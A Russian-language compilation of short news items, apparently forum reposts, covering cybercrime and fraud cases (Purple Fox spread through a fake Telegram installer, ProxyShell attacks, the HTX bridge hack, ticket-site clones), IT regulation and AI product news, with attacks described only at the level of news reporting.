"Я удивлюсь, если узнаю, что мое лицо будет использовано в видеороликах или рекламе разных компаний", — говорит она.
Hour One создает пул так называемых "персонажей". Согласно заявлению представителя компании, на сегодняшний день у них в базе около 100 диджитал- клонов, и каждую неделю их количество растет.
"Люди выстраиваются в очередь, чтобы стать прототипами цифровых персонажей", — говорит Натали Монбиот, директор по стратегии развития компании.
Кто угодно может подать заявку, чтобы стать персонажем. Как и модельное агентство, Hour One фильтрует кандидатов, отбирая тех, кто больше подходит. По словам Монбиот, компания стремится создать широкий "спектр" персонажей, поэтому нужны люди разного возраста, пола, национальности. "В настоящее время около 80% созданных персонажей — это люди младше 50 лет, 70% — женщины и 25% — белые", — пишет СМИ.
Чтобы создать персонажа, Hour One использует 4K-камеры для съемки того, как человек разговаривает и меняет выражение лица. Больше участник ничего не делает. Затем полученные данные обрабатывает AI-программа, аналогично технологии дипфейк. Благодаря этому компания может создавать бесконечное количество видеозаписей, на которых один и тот же человек произносит любые тексты на любом языке.
Клиенты Hour One платят компании за использование цифровых персонажей в рекламных или коммерческих видео. Они выбирают лицо, загружают необходимый текст, и получают видео, где человек произносит, что нужно. Для озвучки используется ПО для преобразования текста в речь и генерации синтетических голосов, которые синхронизируются с движениями губ и выражениями лиц персонажей.
"Стартап также предлагает услугу премиум-класса, при которой звук записывается профессиональными актерами озвучивания. Эти голоса тоже соответствуют мимике персонажа на видео", — пишет медиа.
Компания имеет более 40 клиентов, среди которых есть фирмы, занимающиеся недвижимостью, электронной коммерцией, телемедициной и развлечениями. Одним из основных клиентов является Berlitz — международная языковая школа, предлагающая видеокурсы для изучения иностранных языков под руководством преподавателей. По словам Монбиот, компания теперь не тратит десятки часов на запись и монтаж видео, ведь Hour One может сделать ролик в считанные минуты.
Эксперты Minerva Labs предупреждают о вредоносных установщиках популярного мессенджера Telegram. Как отметили специалисты, троянизированная версия инсталлятора устанавливает в систему Windows бэкдор Purple Fox.
Впервые Purple Fox попал в поле зрения исследователей в 2018 году и отметился функциональными возможностями руткита, которые позволяют ему уходить от детектирования антивирусными средствами.
В марте 2021 года мы писали, что операторы Purple Fox добавили вредоносной программе функции червя, чтобы он мог свободно распространяться по всей экосистеме Microsoft Windows. С помощью зловреда злоумышленники организуют ботнет, добывающий им криптовалюту.
О новой кампании Purple Fox рассказали специалисты Minerva Labs, отметившие в своём блоге следующее:
«Киберпреступникам удалось скрыть свои кибератаки от посторонних глаз, поскольку они разделили вредоносную нагрузку на несколько небольших файлов, большая часть которых практически не детектируется антивирусными движками. Последняя стадия этих атак приводит к установке руткита Purple Fox в систему жертвы».
«Возможности руткита помогают вредоносной программе действовать менее заметно. Например, Purple Fox может дольше оставаться в операционной системе жертвы, а за это время он вполне способен установить дополнительные зловреды».
В описанной экспертами кампании операторы используют в качестве приманки установочные файлы мессенджера Telegram. Они задействуют AutoIt-скрипт, загружающий легитимный инсталлятор мессенджера, а также злонамеренный исполняемый файл TextInputh.exe.
Перед заключительным этапом атаки Purple Fox блокирует процессы известных антивирусов, чтобы избежать детектирования.
• Source: <https://blog.minerva-labs.com/malicious-telegram-installer-drops- purple-fox-rootkit>
В Киеве правоохранители сообщили руководителю туристической компании о подозрении в мошенничестве и присвоении средств, принадлежащих государственному банку, сообщает пресс-служба Национальной полиции Украины.
"21-летний житель Киевской области занимал должность руководителя общества с ограниченной ответственностью, которое предоставляет туристические услуги. Фигурант для осуществления хозяйственной деятельности арендовал POS-терминал у одного из государственных банков. В дальнейшем с помощью системы дистанционного банковского обслуживания мужчина подключил услугу «Эквайринг». После этого, используя платежные данные клиентов иностранных финансовых учреждений, он совершил 138 незаконных банковских операций ", - указано в сообщении.
Все операции злоумышленник проводил без карточек и без ведома их владельцев.
Таким образом он присвоил 630 тыс. грн, принадлежащих государственному банку.
Правоохранители провели обыски в автомобилях и по месту жительства подозреваемого. По результатам их проведения полицейские изъяли мобильные телефоны, компьютерную технику, акт приема-передачи оборудования от банка и документацию.
По данному факту возбуждено уголовное производство по ч. 4 ст. 190 (мошенничество) Уголовного кодекса Украины. Санкция статьи предусматривает наказание в виде лишения свободы на срок до 12 лет с конфискацией имущества.
Фигуранту сообщено о подозрении. Решается вопрос об избрании меры пресечения.
«Оперативники ГУУР МВД России совместно с коллегами из Подмосковья и Вологодской области задержали группу из 18 человек. Они подозреваются в серийном мошенничестве с использованием сети Интернет.
Фигуранты создавали интернет-сайты, на которых размещалась информация о продаже физическим и юридическим лицам оптовых партий различных товаров по низким ценам. После получения предоплаты денежные средства переводились на счета подконтрольных коммерческих структур, обналичивались и похищались.
В настоящее время установлена возможная причастность участников группы к девяти эпизодам мошенничества, ущерб от которых составил более 10 млн рублей.
В ходе обысков у фигурантов изъята компьютерная техника, носители информации, средства связи, печати и штампы, бухгалтерские документы и другие предметы, имеющие доказательственное значение.
Возбуждено уголовное дело по признакам преступления, предусмотренного частью 4 статьи 159 УК РФ. Восемь подозреваемых заключены под стражу, в отношении остальных избраны меры пресечения и принуждения, не связанные с ограничением свободы.
Проводятся следственные действия и оперативно-розыскные мероприятия, направленные на установление всех возможных соучастников и эпизодов противоправной деятельности», - сообщила официальный представитель МВД России Ирина Волк.
Басманный суд Москвы заочно арестовал организатора масштабной аферы с билетами ведущих российских театров Андрея Хартанюка и его мать, владелицу и гендиректора компании «Юрэксперт» Ирину Хартанюк. Оба обвиняются в мошенничестве и незаконном использовании товарных знаков. Тем временем, по данным “Ъ”, список потерпевших от их деятельности вырос: наряду с Большим и Мариинским театрами, а также Московской консерваторией в нем фигурируют РАМТ и Театр наций, а также два физических лица, которых мошенники обманули с билетами в Большой театр почти на 60 тыс. руб.
Рассмотрение ходатайств следователя управления по расследованию особо важных дел центрального аппарата СКР заняло у суда несколько часов. Как выяснилось во время заседания, Андрей Хартанюк и его мать Ирина Хартанюк 12 июля этого года были объявлены в федеральный, а 17 августа — в международный розыск. Господин Хартанюк, по данным следствия, являлся организатором масштабной билетной аферы с использованием сайтов-двойников, а его мать была его помощницей в криминальном бизнесе. Оба, отметил в своем выступлении следователь, обвиняются в нескольких эпизодах особо крупного мошенничества (ч. 4 ст. 159 УК РФ) и незаконном использовании товарных знаков ведущих российских театров (ч. 4 ст. 180 УК РФ). Обвинение им предъявлено заочно, так как мать и сын скрылись от следствия.
Из выступления следователя стало известно, что список пострадавших от деятельности семьи Хартанюк и их сообщников расширился.
Помимо ранее признанных потерпевшими Большого и Мариинского театров и Московской государственной консерватории им. П. И. Чайковского теперь в списке фигурируют также Российский академический молодежный театр, международный культурный центр «Спасская башня», который проводит одноименный фестиваль на Красной площади, Театр наций, а также два физических лица. Им обещали билеты в Большой, но обманули: одного — на 9 тыс. руб., другого — на 50,8 тыс. руб.
Защита выступала против меры пресечения в виде заключения под стражу, однако райсуд встал на сторону следствия, заочно арестовав Андрея и Ирину Хартанюк на два месяца.
Расследованием махинаций с билетами СКР занимается с февраля 2020 года. Сначала речь шла о незаконном использовании товарного знака Мариинского театра, по заявлению руководства которого оно и было возбуждено. Однако затем список потерпевших начал расти, а обвинение было утяжелено статьей «Мошенничество». По данным следствия, летом 2017 года Андрей Хартанюк сколотил из своих знакомых преступную группу, которая вскоре начала продажу билетов с использованием огромной сетки сайтов-клонов популярных театров и культурных программ. Для этого в зоне com аферистами было создано около 300 сайтов. А чтобы ввести покупателя в заблуждение, их дизайн полностью копировал официальные, а названия обыгрывали наименования известных театров или шоу- программ. В частности, появились сайты с доменными именами mariinskii.com, mariinskiy-theatre.com, bol.theater, bol.theatre, spass-tower.com, spass- tower.me, ramt.me, ramt-teatr.com и nations.moscow, которые затем использовались для продаж. Махинации начались, по материалам дела, 15 августа 2017 года в Москве, а вскоре продажи начались и в Санкт-Петербурге. В преступную группу Хартанюка помимо его матери, по данным следствия, вошли генеральные директора компаний Simple Life Innovation и «Без нас никак» Алексей Куринов и Яна Тагина и владельцы фирм «Евротикс», «Тикет маркет» и «Кинкси» Виталий Гашаков и Юлия Чарыкова. Господин Хартанюк и его мать, считает следствие, осуществляли общее руководство группой, глава SLI занимался рекламой и продвижением сайтов-двойников, остальные участники отвечали за сбыт билетов в интернете.
"Театральным клонам расширили репертуар": Узнав о начале расследования, […] господин Куринов несколько месяцев представлял следствию фальшивые справки о своем заболевании коронавирусом, а также пытался склонить свидетелей изменить показания.
Билеты продавались по завышенной стоимости, цена на них могла в десятки раз превышать реальную и доходила до 500–600 тыс. руб.
Общий ущерб, по предположению следствия, составляет около 1 млрд руб.
Адвокат Алексей Кирсанов, представляющий интересы Мариинского театра, доволен ходом следствия, считая его «напористым, неформальным и крайне эффективным». Как подчеркнул адвокат, следователи разделяют позицию потерпевшей стороны, что в данном случае речь идет не только о мошенничестве и незаконном заработке с использованием «торговых марок великих театров». Как уверен господин Кирсанов, действиями аферистов его доверителям был причинен «репутационный и социальный урон». Продавая билеты по завышенным в несколько раз ценам, отметил адвокат, обвиняемые «отсекли от театра очень важную группу зрителей, которые не смогли попасть в Мариинку и другие театры».
Исследователи «Лаборатории Касперского» сообщают, что в августе 2021 года продукты компании заблокировали 19 839 атак на пользователей серверов Microsoft Exchange. Всплеск вредоносно активности в компании связывают, например, с обнаруженными недавно уязвимостями ProxyShell.
По сравнению с июлем число атак на Microsoft Exchange увеличилось на 170%. По мнению экспертов, рост связан с тем, что в текущем году появилось множество эксплоитов для Microsoft Exchange, а владельцы устройств, на которых он установлен, не обновляют его сразу после выхода патчей. Так, только за последние полгода с эксплоитами для Microsoft Exchange Server столкнулись более 74 000 клиентов компании по всему миру.
«В последнюю неделю лета мы зафиксировали в России более 2700 атак с применением эксплойтов ProxyShell. Уязвимости, для которых уже выпущены обновления, могут быть даже более опасны, чем уязвимости нулевого дня, ведь, поскольку информация о них доступна в публичном пространстве, ими могут воспользоваться гораздо больше злоумышленников. Вот почему так важно отслеживать выпуски патчей и незамедлительно обновлять ПО», — комментирует Евгений Лопатин, специалист по кибербезопасности «Лаборатории Касперского».
Click to expand...
Напомню, что о проблемах ProxyShell стало широко известно в начале августа. Название ProxyShell объединяет в себе три уязвимости, которые позволяют добиться удаленного выполнения кода без аутентификации на серверах Microsoft Exchange. Эти проблемы эксплуатируют Microsoft Exchange Client Access Service (CAS), работающий на порту 443.
Минцифры вводит дополнительные критерии для признания ПО российским. Теперь для попадания в реестр программная система должна быть совместима с двумя российскими операционными системами.
Для получения преференций при госзакупках также необходима будет совместимость с российским процессором и наличие прав на средства разработки.
На Федеральном портале проектов нормативных актов размещен проект постановления о дополнительных требованиях к программному обеспечению в реестре Минцифры. Одним из ключевых требований для признания ПО отечественным является совместимость с двумя российскими операционными системами. Однако если речь идет о программной составляющей ПАК, достаточно совместимости с одной российской ОС.
Данное требование будет вводиться постепенно. Для средств виртуализации и офисных приложений оно начнет действовать с 1 июня 2025 года, для систем обслуживания облачных сред и ПО для систем хранения данных — с 1 января 2026 года, для промышленного ПО — с 1 января 2027 года. Сроки для программных продуктов, которые уже входят в реестр российского ПО, Минцифры будет определять индивидуально.
Ужесточение касается и включения в реестр разработок каптивных ИТ-компаний, разработанных для нужд материнских структур. Они могут попадать в реестр только в том случае, если там отсутствует их аналог. Для получения преференций при госзакупках (правило «второй лишний») также вводятся дополнительные критерии. Это подтвержденная совместимость с отечественными процессорами (как минимум одним, с 2028 года с двумя), отечественными браузерами, а также, при наличии средств разработки, отсутствие ограничений (например, санкционных) на использование российскими субъектами.
По мнению экспертов, основным бенефициаром последнего требования является ОС «Аврора», поскольку Android SDK, который используют ОС на базе AOSP, данному критерию не соответствует.«Несоответствие дополнительным критериям не приведет к исключению из реестра, но их выполнение в перспективе даст преимущество в госзакупках» , — сообщила пресс-служба ведомства в ответ на запрос «Коммерсанта».
Данные нормы были зафиксированы еще в приказе Минцифры, который был выпущен в августе 2023 года, но так и не вступил в силу. В итоге по состоянию на октябрь 2024 года лишь половина ПО, входящего в реестр Минцифры, соответствовала требованиям по совместимости с двумя российскими ОС.
Деньги остались у мужчины. На них он купил машины и часть пожертвовал на СВО.
Андрей устроился в компанию "Аэростар МСК" заготовщиком на прокатном станке. За первый месяц ему пришла зп в 17 тысяч. А ровно через месяц упали 1 722 462,78 рублей с пометкой "Зарплата за декабрь". Парень тут же смекнул, что пора валить, и взял больничный.
Когда вышел на работу, вызвали к директору. По словам Андрея, угрожали, требовали подписать документы, чтобы оспорить перевод в суде. Говорит, даже пытались отобрать машину. Отбиться помог травмат.
В итоге компания накатала иск с требованием вернуть деньги. Суд проиграла. Подала кассацию – снова мимо. Андрей доказал: ошибка с переводом была технической, а не арифметической. В бухгалтерии что-то перепутали и не убрали лишние цифры в программе. Так, 1 722 462,78 вместо 22 462,78 оказались на карточке. А значит, работяга ничего никому не должен.
На эти деньги парень купил "Шевроле-Круз" и "Шевроле-Авео", золотые украшения жене, а часть средств направил на помощь бойцам ЛНР.
Турецкая полиция арестовала замруководителя филиала DenizBank в Манавгатском районе Антальи Утку Эрдем и еще семь сотрудников банка по подозрению в растрате средств клиентов и совершении незаконных криптовалютных операций.
В результате проведенной в DenizBank инспекционной проверки было установлено, что заместитель руководителя филиала Утку Эрдем (Utku Erdem) перевела в общей сложности 205 млн лир со счетов клиентов банка знакомым людям в период с 2021 по апрель 2024 года.
Администрация DenizBank возбудила уголовное дело. Впоследствии Генеральная прокуратура Манавгата в рамках расследования инцидента выдала ордера на арест восьми подозреваемых, в том числе руководителя филиала, его заместителя, а также нескольких сотрудников банка, причастных к совершению мошеннических операций.
Подозреваемые признали свою вину и сообщили следствию, что деньги, снятые со счетов клиентов, использовались для приобретения цифровых активов на зарубежных криптовалютных биржах и были потеряны при обмене криптовалют.
Напомним, что согласно отчету аналитиков криптовалютной биржи KuCoin, более 50% жителей Турции в возрасте от 18 до 60 лет инвестируют в криптовалюты. За последние два года данный показатель вырос на 12%.
Киберполицейские Днепропетровщины совместно со следователями областного ГУНП при процессуальном руководстве Днепропетровской областной прокуратуры разоблачили трех мошенников из г. Каменское, которые продавали через интернет несуществующие товары.
Установлено, что 33-летний мужчина совместно со своим другом размещал на известном торговом онлайн-сервисе и в соцсети объявления о продаже дронов, компьютерной техники, мототранспорта и автозапчастей по наиболее привлекательной цене. В дальнейшем дельцы привлекли к противоправной деятельности еще одного своего знакомого.
Аферисты убеждали покупателей осуществить подписку за выбранный товар на банковские карты мошенников. После получения средств злоумышленники переставали выходить на связь, а заказчики своих покупок так и не получали.
Таким образом фигуранты обманули по меньшей мере 20 жителей Украины из разных регионов. Общая сумма убытков составляет почти 1,2 миллиона гривен.
Полицейские при поддержке спецназовцев КОРД провели 20 обысков по местам проживания и регистрации участников преступной группы, а также в принадлежащих им помещениях и транспортных средствах. Изъяты банковские карты, компьютерная техника, телефоны, сим-карты, черновые записи, четыре автомобиля и денежные средства в разной валюте на сумму, эквивалентную 200 тысячам гривен.
Следователи ГУНП в Днепропетровской области объявили организатору и его сообщнику подозрение по ч. 3, 4 ст. 190, а их пособнику - по ч. 2 ст. 190 (Мошенничество) Уголовного Кодекса Украины.
В отношении первых двух фигурантов судом избраны меры пресечения в виде содержания под стражей с правом внесения залога более полутора миллионов гривен.
Продолжаются следственные действия для установления возможных сообщников подозреваемых и полного круга потерпевших. Проверяется причастность фигурантов к совершению мошеннических действий по другим схемам.
Бабки слил на прокачку персонажа в PUBG. Отношения кончились в отделе полиции.
25-летний Антон и Марина (имена изменены) были вместе пять лет, но общего между ними мало: девушка трудилась и откладывала деньги на покупку комнаты в коммуналке. Парень — качал мышцы в зале и ЛВЛ в онлайн-шутере для мобильных устройств. (Конкретно внешний вид персонажа, на способности это не влияет).
В какой-то момент всё рухнуло, Марина начала собирать вещи — и тут обнаружила пропажу в тайнике. Из 500К накоплений осталось всего 250. Антон сначала отрицал, но после обращения девушки в полицию во всём признался: аккуратно тащил деньги разными суммами последние пять месяцев. Всё похищенное у бывшей он возместил. Тем не менее, прокуратура Петербурга утвердила обвинительное заключение — дело о краже с причинением значительного ущерба уже направлено в суд.
Джастин Сан сообщил о хакерской атаке на горячий кошелек биржи HTX и кроссчейн-мост Heco Bridge. Все операции на платформах приостановлены.
HTX and Heco Cross-Chain Bridge Undergo Hacker Attack. HTX Will Fully Compensate for HTX's hot wallet Losses. Deposits and Withdrawals Temporarily Suspended. All Funds in HTX Are Secure, and the Community Can Rest Assured. We are investigating the specific reasons for the hacker…
— H.E. Justin Sun 孙宇晨 (@justinsuntron) November 22, 2023__https://twitter.com/x/status/1727304656622326180
Click to expand...
Сан заверил, что торговая платформа компенсирует потерянные средства за свой счет. Детали инцидента обнародуют после завершения расследования.
Одними из первых на проблему обратили внимание исследователи PeckShield. Изначально они заметили вывод 10 145 ETH (~$19 млн) из моста Heco.
Update: Total $86.6M worth of cryptos
-346,994 $TUSD
-42,399 $LINK (~$601,641)
-619,000 $USDC
-173,200 $UNI ($931,816)
-346.9M $SHIB (~$2.8M)
-489 $HBTC ($18.8M)
-42M $USDT
-10,145 $ETH (~$19M)
— PeckShieldAlert (@PeckShieldAlert) November 22, 2023__https://twitter.com/x/status/1727290028064436539
Click to expand...
После этого хакер продолжил выводить другие криптовалюты — суммарный ущерб составил около $86,6 млн.
В PeckShield также отметили, что транзакции на перевод средств подтвердил оператор, поэтому рассматривается сценарий его компрометации.
По оценкам руководителя отдела исследований Wintermute Игоря Игамбердиева, имел место дополнительный эксплойт самой биржи HTX на $23,4 млн. Он утверждает, что вывод средств произошел сразу после атаки на кроссчейн-мост и по аналогичной схеме.
Heco Bridge запустили для обеспечения недорогого межсетевого взаимодействия между Ethereum и поддерживаемым HTX блокчейном Heco Chain. Проект представлял собой комбинацию протоколов Tron и экосистемы мостов BitTorrent.
Власти Филиппин объявили об изъятии в городе Пасиг рекордной партии сим-карт, которые должны были, но не поступили в распоряжение мошенников и киберпреступников. Местные СМИ со ссылкой на Центр по расследованию и координации киберпреступлений (CICC) сообщают, что речь идет о 90 тысячах сим- карт.
«Сим-карты прошли регистрацию и содержат полный набор данных, в том числе имена и адреса. Однако все эти сведения — фейковые. Следы таких сим-карт мы нередко находили в делах о массовом скаме и мошенничестве», — заявил заместитель секретаря CICC Александр Рамос (Alexander Ramos).
Click to expand...
Он добавил, что получателем изъятых сим-карт был человек, который, видимо, управлял шопом по их продаже. Рамос не ответил на вопрос о том, задержан ли этот человек. По его словам, в ходе одного из недавних рейдов специалистам CICC удалось задержать человека, который мог подделывать до 300 карт ежедневно.
source: newsinfo.inquirer.net/1853539/anti-cybercrime-agency-seizes-at- least-90k-prelisted-sim-cards-in-pasig
На этой неделе разгорелся скандал вокруг компании Tuta, разработчика популярного почтового сервиса с шифрованием сообщений (ранее известного как Tutanota). Компанию обвинили в сотрудничестве с правоохранительными органами и спецслужбами.
Обвинения прозвучали в ходе судебного процесса над Кэмероном Ортисом, бывшим руководителем секретного подразделения Королевской канадской конной полиции. Его преследуют по делу о попытке продать конфиденциальные данные преступным группировкам.
На суде мужчина заявил, что на самом деле участвовал в спецоперации. По его словам, агенты использовали Tuta как «ловушку» для наблюдения за правонарушителями в интернете.
Ортис утверждает, что о создании шпионского приложения его проинструктировал один из агентов разведывательного альянса «Пять глаз». Целью было привлечь пользователей из криминальных кругов и тайно собирать на них компрометирующую информацию.
При этом Ортис якобы не стал докладывать руководству Конной полиции о деталях секретного дела.
Представители Tuta категорически отвергают все обвинения. В официальном заявлении говорится, что их сервис не имеет отношения к спецслужбам и вообще каким-либо государственным организациям. В программном коде отсутствуют скрытые функции, позволяющие получать несанкционированный доступ к данным пользователей. Исходный код приложения находится в открытом доступе на Github, хотя код серверной части по-прежнему не опубликован.
Разработчики напомнили, что шифрование происходит непосредственно на устройстве клиента.
В Tuta внимательно следят за ходом судебного разбирательства над Ортисом, который пока что не предоставил никаких фактических доказательств своих слов.
Особый интерес вызывает то, что Ортис, по данным следствия, передавал секретные материалы Винсенту Рамосу, ранее возглавлявшему компанию Phantom Secure. Эта компания производила модифицированные смартфоны с особой защитой от прослушки и перехвата данных. Очевидно, устройства были крайне популярны в криминальных кругах.
ФБР неоднократные пыталось заставить Рамоса внедрить в программное обеспечение Phantom Secure бэкдор для скрытой слежки за известным наркокартелем. Позже мужчину обвинили в содействии преступникам.
В расследование деятельности Phantom Secure и арест Рамоса были также вовлечены правоохранительные органы Канады. В 2019 году Рамос был приговорен к 9 годам тюрьмы .
Неизвестно, есть ли какая-то связь между делами Ортиса и Рамоса. Пока что обвинения в адрес Tuta выглядят совершенно необоснованными. Сами разработчики по-прежнему все отрицают и гарантируют пользователям полную конфиденциальность.
source: tuta.com/blog/tutanota-not-a-honeypot
Киберполицейские Винницкой области разоблачили преступную хакерскую группу, которая использовала скомпрометированные аккаунты поисковых сервисов, размещала рекламу с фишинговыми сайтами иностранных банков и присваивала деньги.
Отмечается, что одним из участников хакерской группы является 29-летний житель с. Якушивцы. Он покупал в Даркнете HTTP-cookie (файлы, хранящиеся в браузере и содержащие необходимые данные для входа в систему или аккаунты), что позволяло несанкционированно вмешиваться в аккаунты пользователей поисковых сервисов. Таким образом удалось присвоить как минимум 5 млн грн.
Со скомпрометированных аккаунтов злоумышленники платили за рекламу для фишинговых сайтов иностранных банков. Таким образом, эти мошеннические сайты выводились на первые позиции во время поиска. Далее злоумышленники получали учетные данные клиентов банков, пытавшихся авторизироваться на поддельных ресурсах. А уже с помощью полученных данных злоумышленники присваивали деньги. Отмечается, что группа рекламировала фишинговые сайты как в собственных целях, так и по заказу других хакеров.
В настоящее время правоохранители устанавливают окончательную сумму ущерба, нанесённого пострадавшим.
Открыто уголовное производство по ч. 2 ст. 361 (Несанкционированное вмешательство в работу информационных (автоматизированных), электронных коммуникационных, информационно-коммуникационных систем, электронных коммуникационных сетей) Уголовного кодекса Украины. Санкция статьи предусматривает до 5 лет лишения свободы.
По сообщению организации Global Initiative Against Transnational Organized Crime («Глобальная инициатива против транснациональной организованной преступности», GI-TOC), между странами ООН должны начаться переговоры о создании правовых инструментов для борьбы с набирающей обороты киберпреступностью. Процесс будет непростым, поскольку у стран разные представления о таком виде преступлений.
Переговоры должны начаться в 2022 году. Если они пройдут успешно, в итоге может появиться важнейшая стратегия со времен Конвенции ООН против транснациональной организованной преступности (UNTOC), которую подписали в 2000 году.
Теперь, когда жизнь людей тесно связана с интернетом, преступления в Сети совершают как новые, так и давно существующие криминальные структуры. Тенденцию усугубила пандемия: миллионы людей работают из дома, почти постоянно общаясь через интернет.
В отличие от других видов незаконной деятельности киберпреступность не ограничена физическим пространством, преступления редко происходят в пределах одной страны, не говоря уже об одной муниципальной юрисдикции. До сих пор у ООН не было положений о борьбе с международной киберпреступностью, не было и общего определения того, что такое киберпреступление.
«В январе 2022 года правительства стран — членов ООН начнут разрабатывать механизм борьбы с глобальной киберпреступностью — первый инструмент, который поможет обуздать это широко распространенное и сложное явление, — [говорится в сообщении GI-TOC](https://globalinitiative.net/wp-content/uploads/2021/12/UN- Cybercrime-PB-22Dec-web.pdf) о переговорах. — И хотя многие убеждены, что нужно увеличивать масштабы глобального сотрудничества и формировать общее понимание проблем, процессу мешает глубокое недоверие между государствами».
Как это ни парадоксально, меру предложила Россия, где орудует немало киберпреступников, нацеленных на другие страны. А многие западные государства, в том числе США и Великобритания, выступили против.
Причина такой позиции — опасения, что новое законодательство окажется слишком общим, и его можно будет обернуть против свободы слова и политических активистов.
«Накануне переговоров Россия представила на рассмотрение проект соглашения, который включает положения о детской порнографии, о подстрекательстве к дискриминации по расовому или этническому признаку и преступлениях против человечности, — сообщают в GI-TOC. — Но там же есть раздел о подстрекательстве к самоубийству (статья 16), а также расплывчатая статья о „преступлениях, связанных с участием несовершеннолетних в противоправных действиях, угрожающих их жизни или здоровью“».
Россия предлагает подписывающим сторонам включить определенные преступления в свое законодательство, в том числе объявить противозаконным распространение в Сети материалов с призывами к идеологическим преступлениям — другие считают это предложение «ящиком Пандоры» для нарушений прав человека.
В GI-TOC считают, что у ООН есть несколько вариантов.
Либо предложение России поддержат, опираясь на уже существующую Будапештскую конвенцию о киберпреступности, либо основой станет все та же Будапештская конвенция, а ряд самых опасных предложений России отклонят, либо дискуссия продолжится.
«В целом и возражения, и сам процесс выявили значительные политические, идеологические и вещественные препятствия на пути к созданию нового соглашения о киберпреступности», — отмечается в сообщении.
«Геополитика не допускает доверия во времена кризиса мультилатерализма, когда основным полем битвы стала киберсфера, — говорится там же. — Нынешним мерам реагирования на кибератаки не хватает прозрачности, и возникает вопрос о том, нужно ли государствам соглашение, которое прольет свет на их действия».
Программисты GitHub [подали коллективный иск против
GitHub](https://www.vice.com/en/article/bvm3k5/github-users-file-a-class-
action-lawsuit-against-microsoft-for-training-an-ai-tool-with-their-code)
его материнской компании Microsoft и ее технологического партнера OpenAI за
нарушение их лицензий на открытый исходный код и использование их кода для
обучения искусственного интеллекта Microsoft под названием Copilot.
Проприетарный Copilot был обучен на коде из общедоступных репозиториев, тем самым нарушив лицензии на программное обеспечение, которые которые разрешают только некоммерческое распространение и модификацию кода и часто имеют ограничения, включая требование сохранения имени авторов.
Юристы процесса также запустили
сайт
посвященный расследованию GitHub Copilot.
случай представляет собой первый крупный шаг в борьбе с нарушениями прав интеллектуальной собственности в технологической отрасли, возникающими из-за систем искусственного интеллекта.
Судебный процесс также может оказать влияние и на другие системы ИИ, такие как
DALL-E
Google представила обновление своей модели искусственного интеллекта Gemini 1.5 Pro, добавив возможность анализа аудиофайлов. Теперь модель может слушать аудио, например, с аудиоконференций или видеоматериалов, и извлекать из них информацию без необходимости преобразования в текстовую транскрипцию.
На мероприятии [Google Next](https://blog.google/products/google-cloud/google- cloud-next-2024-generative-ai-gemini/#models-expanded-access) компания также объявила о публичном доступе к Gemini 1.5 Pro через свою платформу для создания приложений на основе искусственного интеллекта Vertex AI. Новая версия была впервые представлена в феврале и уже превзошла по производительности самую мощную модель в семействе Gemini – Gemini Ultra. Отмечается, что Gemini 1.5 Pro способна понимать сложные инструкции и обходится без дополнительной настройки.
Доступ к Gemini 1.5 Pro ограничен для пользователей, не имеющих доступа к Vertex AI и AI Studio. В настоящее время широкая публика знакомится с языковыми моделями Gemini через чат-бота Gemini, где Gemini Ultra используется для питания Gemini Advanced. Несмотря на мощные возможности и понимание длинных команд, Gemini Ultra уступает по скорости Gemini 1.5 Pro.
Gemini 1.5 Pro не единственная модель искусственного интеллекта от Google, получившая обновление. Модель генерации текста в изображение Imagen 2 теперь включает функции редактирования изображений, позволяя добавлять или удалять элементы на картинках. Некоторые функции Imagen, включая редактирование изображений, уже были доступны в моделях других разработчиков и на смартфонах Samsung Galaxy нового поколения.
Также Google внедрила функцию цифрового водяного знака SynthID для всех изображений, созданных моделями Imagen, что позволяет определить происхождение изображения с помощью специального инструмента.
Google также организовала предварительный просмотр технологии, позволяющей подкреплять ответы ИИ актуальной информацией из поиска Google. Метод стал ответом на критику, связанную с недостоверностью некоторых ответов ИИ-моделей, в том числе и ограничение Gemini в ответах на вопросы, касающиеся выборов в США 2024 года.
Gemini также столкнулась с критикой за создание изображений с исторически некорректными персонажами. Пользователи в сети начали подшучивать над странными принципами работы модели. На различных платформах распространялись посты, демонстрирующие, что Gemini настолько упорно следует этическим настройкам, что искажает образы исторических персонажей.
Основным нововведением в Gemini 1.5 Pro при релизе модели стала технология «Mixture of Experts» (MoE), позволяющая обрабатывать запросы более эффективно и экономично. Одна большая нейросеть теперь будет разделена на множество мелких «экспертных» нейросетей, которые смогут давать более точные ответы и развиваться независимо друг от друга, что упростит процесс их дальнейшего обучения.
В среду команда KDE предупредила пользователей Linux о необходимости проявлять "крайнюю осторожность" при установке глобальных тем, даже из официального магазина KDE, поскольку эти темы запускают произвольный код на устройствах для настройки внешнего вида рабочего стола.
В настоящее время магазин KDE позволяет любому пользователю загружать новые темы и различные другие плагины или дополнения без каких-либо проверок на вредоносное поведение.
Однако, как сообщили в KDE, в настоящее время у нее нет ресурсов для проверки кода, используемого каждой глобальной темой, представленной для включения в ее официальный магазин. Если темы неисправны или вредоносны, это может привести к неожиданным последствиям.
"Глобальные темы и виджеты, созданные сторонними разработчиками для Plasma, могут и будут запускать произвольный код. Мы рекомендуем вам проявлять крайнюю осторожность при использовании этих продуктов", - предупредили в KDE. "Глобальные темы меняют не только внешний вид Plasma, но и поведение. Для этого они запускают код, и этот код может быть ошибочным, как в случае, упомянутом выше. То же самое касается виджетов и плазмоидов".
Выполнение кода необходимо, поскольку глобальные темы предназначены для изменения всего на плазменном рабочем столе, от значков до оформления окон, экранов блокировки, заставок, обоев, цветовых схем и так далее, с использованием исполняемых скриптов bash.
Сотрудниками Отдела экономической безопасности и противодействия коррупции УМВД России по г. Нижнему Новгороду пресечена деятельность организованной группы, участники которой подозреваются в незаконной банковской деятельности.
«По имеющимся данным, в период с января 2019 по октябрь 2023 года злоумышленники, не имея регистрации и специального разрешения, оказывали гражданам и юридическим лицам услуги по проведению финансовых операций. Имея доступ к расчетным счетам фиктивных организаций, сообщники осуществляли переводы поступивших от клиентов денежных средств в адрес подконтрольных фирм и индивидуальных предпринимателей с назначением платежей по фиктивным основаниям. В последующем деньги выводились с расчетных счетов в виде наличности и передавались клиентам».
Click to expand...
Предварительно установлено, что доход от противоправной деятельности превысил 146 миллионов рублей.
Полицейскими задержаны предполагаемый организатор, бухгалтер и еще пятеро соучастников, которые подготавливали необходимые платежные документы, а также занимались поиском лиц, заинтересованных в услугах по обналичиванию своих доходов
В ходе обысков по адресам проживания подозреваемых, а также в семи офисах и при осмотре десяти автомобилей изъяты денежные средства, мобильные телефоны, компьютерная техника, свыше двухсот банковских карт, а также другие предметы и документы, имеющие доказательственное значение.
source: mvdmedia.ru/news/ofitsialnyy-predstavitel/irina-volk-v-nizhnem- novgorode-sotrudnikami-politsii-zaderzhany-tenevye-bankiry
